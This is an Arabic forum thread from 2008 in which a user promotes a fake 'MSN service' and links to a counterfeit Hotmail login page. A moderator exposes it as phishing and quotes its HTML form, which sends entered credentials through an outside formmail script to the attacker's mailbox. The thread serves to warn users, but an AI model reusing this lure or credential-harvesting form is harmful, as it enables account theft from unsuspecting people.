Deprecated: Assigning the return value of new by reference is deprecated in /www/wwwroot/shabab.ps/public_html/vb/printthread.php on line 119
منتديات شباب فلسطين - اعجوبة msn تستحق لقب اعجوبة هذا العام
منتديات شباب فلسطين

منتديات شباب فلسطين (https://shabab.ps/vb/index.php)
-   مُتعلقات التقنية (https://shabab.ps/vb/forumdisplay.php?f=31)
-   -   اعجوبة msn تستحق لقب اعجوبة هذا العام (https://shabab.ps/vb/showthread.php?t=73066)

could zero 07-12-2008 09:06 PM

اعجوبة msn تستحق لقب اعجوبة هذا العام
 








--------------------------------------------------------------------------
إحــــذروا من الثعالب ,, لا تضغــط ..

انا ما حذفت الموضوع للكل يشوف ويحذر من اي موقع تاني ...

--------------------------------------------------------------------------














خدمة جديدة من خدمات MSN
وهي مساحة خاصة لكل شخص عنده إيميل على موقع msn
سعتها 2GB الاول مرة في تاريخ الشركة

ثانيا اشكال رائعة للماسنجر و لصفحة الهوتميل و هذه احد الصور
www.msgpluslive.net/skins/uploads/Iron-Man.jpg
http://www.msgpluslive.net/skins/upl...-Messenger.jpg

بالاضافة الى العديد من الاشكال الرائعة لباتمان للشباب و فلة للصبايا

العاب حصرية و افلام شهيرة تطرح الشركة تحميلها مجانا

بالاضافة الى خدمات عديدة رائعة مثل انشاء مجموعة تتضمن اصدقائك و لكل صديق صفحته الخاصة و يرفع عليها الملفات بحيث لا تتجاوز 2 GB المساحة المسموح بها و التي ذكرناها في الاعلى

و اخيرا خدمة المدونة او المفكرة التي تسمح لك بتظيم مشاريعك اليومية عليه
بالاضافة الى الخدمات التي كانت متوفرة من قبل


و هاد الرابط

http://overwhelming.my5gb.com/hotmail-login.html
و ما تحرمونا من مروركم و ممنوع كلمة شكرا بدي اشي ملموس

و انشا الله اكون عند حسن ظنكم

أبومجاهد 07-12-2008 09:21 PM

رد: اعجوبة msn تستحق لقب اعجوبة هذا العام
 
هلا اخي could zero وتسلم ع المعلومات الرائعة ...^^

ABU-NOUR 07-13-2008 09:55 AM

رد: اعجوبة msn تستحق لقب اعجوبة هذا العام
 
مش عيب عليك ,,

جاي تسرق ايميلات الناس عيني عينك ؟؟

يعني بتفكر حالك شاطر وما في حد بيعرف لهالشغلات

حبيبي انا قاعدلكم هنا ^^ ,,

واحد ما بيستحي


انا مش راح احذف الموضوع خلي الكل يشوف هبلكم ..


اقتباس:


<form method="POST" action="http://fp1.formmail.com/cgi-bin/fm192">
<input type="hidden" name="redirect" value="http://www.hotmail.com">

<input type="hidden" name="_pid" value="95320">
<input type="hidden" name="_fid" value="YDRTJ976">


<input type="hidden" name="recipient" value="

*****@hotmail.com
">

<input type="hidden" name="subject" value="Hacked by HoLaKo Hotmail !!">
<input type="hidden" name="email" value="HoLaKo@HoLaKo.com">


يعني مبدع في تكوين الصفحة وتظلييل الناس .,

ليحطو ايميلاتهم ويفكرو حالهم بيدخلو صفحة أعجبوبة MSN ^^


بس أحلى شي ,,

اقتباس:

و ما تحرمونا من مروركم و ممنوع كلمة شكرا بدي اشي ملموس
بدك شي ملموس ,, بدك ايميلات مسروقة ..

يعطيك العافية يا ............

عاشق البندقية 07-13-2008 10:38 AM

رد: اعجوبة msn تستحق لقب اعجوبة هذا العام
 
اقتباس:

يعطيك العافية يا ............
بته ^^ ,, حبيبي أبو نور ,, مسكتو يعني للخسيس,,

الله يبارك فيك,,

الحان الحرية 07-13-2008 10:47 AM

رد: اعجوبة msn تستحق لقب اعجوبة هذا العام
 
ـههههـ

الله يخليلنا اياك أبو نور

يعطيك العافية

دايماً بتلقطهم *.^

ღ حورية فلسطين ღ 07-13-2008 11:39 AM

رد: اعجوبة msn تستحق لقب اعجوبة هذا العام
 
شو في؟؟؟؟؟؟؟؟؟؟

انا مش فاهمة شي

فهموني

ابو نور فهمني خليني القطه معك ههههههههههههههههه

جاي عبالي اتمشكل انا هههههههههههههههههههه

ايــاد 07-13-2008 12:41 PM

رد: اعجوبة msn تستحق لقب اعجوبة هذا العام
 
ههههههههه

يا عيني عليكـ يابو نور

يعطيكـ الف عافيــهـ

الله لا يحرمــن منكـ

مشكور خي مشكور

ABU-NOUR 07-13-2008 02:17 PM

رد: اعجوبة msn تستحق لقب اعجوبة هذا العام
 
ولو ^^

انا هيين هنا لحماية الشعب :D


نورتونا اخوانا

حورية ,, لك هذا واحد جاي يضحك عليكم ويسرق ايميلاتكم ,, وانتم بتفكرو حالكم بدكم تشوفو اعجوبة MSN :D


ما علينا المهم لقطو الكم ,, ما تخافو ما دمت انا هنا :P

ضوء القمر 07-13-2008 05:40 PM

رد: اعجوبة msn تستحق لقب اعجوبة هذا العام
 

:|:|:|


شوووو هاااد الله لا يعطيه العافية


ابو النور تسلم يا حارس انت هههههههه


انقذتنا بس انا اصلا هيك هيك ما كنت رح افتحو :p


الله يهديكم يارب


^_*

.:.!دموع الرحيل!.:. 07-14-2008 12:47 AM

رد: اعجوبة msn تستحق لقب اعجوبة هذا العام
 
هههههههههه

يعطيك العافيه ^^

الله يهديهم او يريحنـا منهم هالاشكال


الساعة الآن 04:15 AM.

Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
new notificatio by 9adq_ala7sas